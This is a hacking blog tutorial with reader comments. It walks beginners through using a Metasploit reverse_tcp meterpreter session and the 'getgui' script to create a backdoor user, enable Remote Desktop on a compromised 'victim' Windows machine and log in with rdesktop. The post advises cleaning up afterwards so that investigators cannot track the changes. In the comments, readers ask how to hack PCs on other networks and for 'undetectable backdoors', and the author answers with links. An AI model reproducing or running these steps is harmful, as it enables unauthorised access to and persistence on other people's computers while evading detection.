5 Steps to Enable Remote Desktop Using Metasploit Meterpreter
Type : Tutorial
Level : Beginner, Medium
Last year when I’m teaching about computer security class, one student come and ask “can you give me simple tutorial how to use command prompt?“, then I say “I don’t think so it will be do in a short course because learning about command prompt you should practice everyday for first times and make it familiar like your mother tongue” from this situation I know that not every people know about command prompt or something related to console based. How about hacking?yep it’s the same…sometimes newly learned they just follow tutorials, but didn’t know what exactly they doing.
Today I will write simple tutorial how to enable Remote Desktop(use Remote Desktop Protocol on TCP port 3389) when you’ve already inside remote system using Metasploit Framework. This method should be useful if you have limitation how to use command prompt. In this case, we will utilize Carlos Perez’s ‘getgui’ script, which enables Remote Desktop and creates a user account for you to log into it with.
Requirement :
2. Backtrack 5(or another linux OS)
Step-By-Step :
1. My favourite meterpreter is using reverse_tcp. If you also like to use reverse_tcp for your payload, you can use like the command below.
set payload windows/meterpreter/reverse_tcp
2. Inside the meterpreter, execute
meterpreter > run getgui -h
to view the help.
3. To add a user with username : valent and password : r4h45i4 and then enable the Remote Desktop Service
run getgui -u valent -p r4h45i4
Yep we already successfully created the user and activated the Remote Desktop Service.
Please note the last command “For cleanup use command : run multi_console_command….bla…bla….bla” it will be used after finish using the Remote Desktop Service of victim computer.
4. To connect to victim using remote desktop, we can use rdesktop program (it’s already installed on backtrack).
rdesktop -u <username> -p <password> <ip-address-target>
initializing……and then….
5. You also should remember that when you add user it’s mean that you are adding one new user on remote computer. Be wise to use this methods, because when you do much changes, you also will left a lot of changes on remote computer and it can be tracked by investigators 
. To clean up the user we’ve already created before(you can see on step 3).
Finish…
hope it’s useful for you…any question?just drop on comment box.
Incoming search terms:
- backtrack 5 remote desktop
- remote desktop backtrack 5
- metasploit remote desktop
- metasploit RDP
- backtrack remote desktop
- metasploit port 3389
- backtrack rdp
- how to enable remote desktop through command line
- metasploit 3389
- remote desktop backtrack
Written by Vishnu Valentino.
Founder of hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com
See all posts by v4L || Visit Website : http://www.vishnuvalentino.com
Popular Posts
44 Responsesto “5 Steps to Enable Remote Desktop Using Metasploit Meterpreter”
Trackbacks/Pingbacks
- Hacking Windows 7 SP 1 Using Java Signed Applet Social Engineering Code Execution | Vishnu Valentino Hacking Tutorial, Tips and Trick - [...] 5 Step to Enable Remote Desktop [...]
Leave a Reply
Links
Get Updates via Networkedblogs
Hi,
I have a bigginers Q.
where do I find the Meterpreter in BT5?
#Hagai
Firstly, you should exploited a machine first and then set payload using meterpreter. Please refer to this tutorial http://www.hacking-tutorial.com/computer/hacking-mozilla-firefox-3-5-to-3-6-nstreerange-vulnerability-using-metasploit/
how do we know the username n password of the victim???
n do we need to add new user to the victim compter?
#puppet
First of all, you should find a vulnerable target…and then try to compromise it…when you successfully compromise target, you didn’t need to input any password or username
i have a probleme Unknown command: rdesktop
#mehdi
Hmm….maybe you didn’t have rdesktop installed…try to run
apt-get install rdesktop.i have problem with rdesktop, password was invalid, but i've double check password, but still gettin error
#th3bAdh
hmm…if the password was correct it should have no error like this…maybe the password was empty or issue with keyboard localization..
Thx for info….
Download RDesktop
http://garr.dl.sourceforge.net/sourceforge/rdesktop/rdesktop-1.6.0.tar.gz
I am using following payload:
(windows/shell/reverse_tcp):
but wen i run the exploit..
after the binding, it says "Sending exploit …"
and then it returns me ….msf exploit(ms03_026_dcom) >
so nothing happens…..you know what could be the possible reason for this?
Thanks!
#josh
maybe it’s mean that the target isn’t vulnerable.
when i write getgui – h run , run the command it says unokwon ..
What should I do ?
#bagus
did you already inside meterpreter console?
Whenever I attempt to create a shell in target computer, the handler is created on my end, but the connection times out. Why is that? Is it error on my end?
-DeusIgni
#Deuslgni
Hmm maybe the target prevent you to create it…doesn’t mean that if you got meterpreater,you’ll also got the shell…it’s depend with the vulnerability ranking…fyi the target machine in this tutorial was XP SP0..
Is there a way to use this exploit on XP SP3?
-DeusIgni
#Deuslgni
maybe you can try this http://www.hacking-tutorial.com/computer/hacking-windows-7-sp-1-using-java-signed-applet-social-engineering-code-execution/ in your windows xp sp3
hi
i am using bt5 r2 in vmware.i am trying to remotely control my win 7 desktop.when meterpreter session -i 1 is started like
meterpreter>
when i enter the shell,pwd or cd command it give me error of unknoun command
what will i do??
#boby
maybe the rating of exploit you use not an excellent one. btw if you want to try and make sure it work you can view this tutorial http://www.hacking-tutorial.com/hacking-tutorial/create-simple-exploit-using-metasploit-to-hack-windows-7/
I m using windows/meterpreter/reverse_tcp,i have same problem.I have tried java_signed_applet i still have this problem " unknown command ".when i was using backtrack 5 r1 it was working very well
Is there any installation problem or may have some bugs in backtrack 5 r2???
metertreter>pwd
pwd unknoun command
same problem
#boby
Hmmm….maybe you can try to update your metasploit framework first by using
msfupdatecommand.Thank you very mush for your reply…
which tool of backtrack 5 must be update after installation??and which command i have to use???
i am using these commands
for msf
=======
1,msfupdate
for library
===========
2,apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils
which command you have suggested me to update backtrack 5 R1 or Backtrack 5 R2 for better performance?
#boby
btw I didn’t know the exact thing from your problem and how you install your BT. maybe you also can try to update your system using
apt-get updateandapt-get upgrade.my problem is solve.Thanks for your help
what is stupidity, provide a metasploit payload when you just need to add user to a group and start a service from shell. I understand the reason you provide it but would be a lot more usefull to actually explain it than just provide script kiddies…
#deff
it’s just wasting your time… 
LoL…maybe what you mean is http://www.hacking-tutorial.com/tips-and-trick/how-to-enable-remote-desktop-using-command-prompt/
if you think like that, so why you didn’t contribute to wrote an “awesome tutorial” here? or maybe you give your own tutorial link…don’t just say and criticize without action
ps : next time it’s better use your real e-mail not the fake one
merci monsieur
I have metasploit 4.4 gui comunity edition but no change to exploit. btw i have windows 7 sp1
#Puka
I don’t understand?
i hv installed backtrack on vmware and hack my windows 7 system with the system intenal ip but how i can set my dynamic ip to hack computer remotely
#anonymous
read more here : http://www.hacking-tutorial.com/hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/
Hi, when i tried to do the rdesktop -u ( ) -p ( ) and the ipaddress and pressed enter it says Autoselected keyboard map en-us and does not do anything…do you know why that happens?
#samuel
hmm…maybe your remote desktop service on victim PC haven’t started yet..
maybe you can take a look to this tutorial : http://www.hacking-tutorial.com/tips-and-trick/how-to-enable-remote-desktop-using-command-prompt/
Thanks for your time and effort to provide tutorials!
hi
please giive me a toturial to hack pc on other network.please guide me
#boby
http://www.hacking-tutorial.com/hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/
Like other people, I am also getting the “unknown command” error once the meterpreter prompt is up, and no commands will work. You can see it here: http://imgur.com/WK2KQ What causes this?
after executing this command :
run getgui -u testuser -p testpass
show me this message :
This version of Meterpreter is not supported with this Script!
what’s the problem?
#josh
maybe you can try to update the metasploit library
msfupdate.Hi,
I want download vanish.sh and crypter.ph for backtrack 5 r3,I search it on google but I cannot find it.kindly give me these undectable backdoors or download link.I will be very thankful to you
#boby
I think you just haven’t search it
http://pastebin.com/7xmvGnks
No its not
I search on net,I found the code but it didn’t work 
Thanks for you corporation
after I type set payload windows/meterpreter/reverse_tcp the meterpreter won’t to show up, why? thanks
#fahmi
you need to exploit 1st and can get the meterpreter console. See other hacking tutorials here http://www.hacking-tutorial.com/category/hacking-tutorial/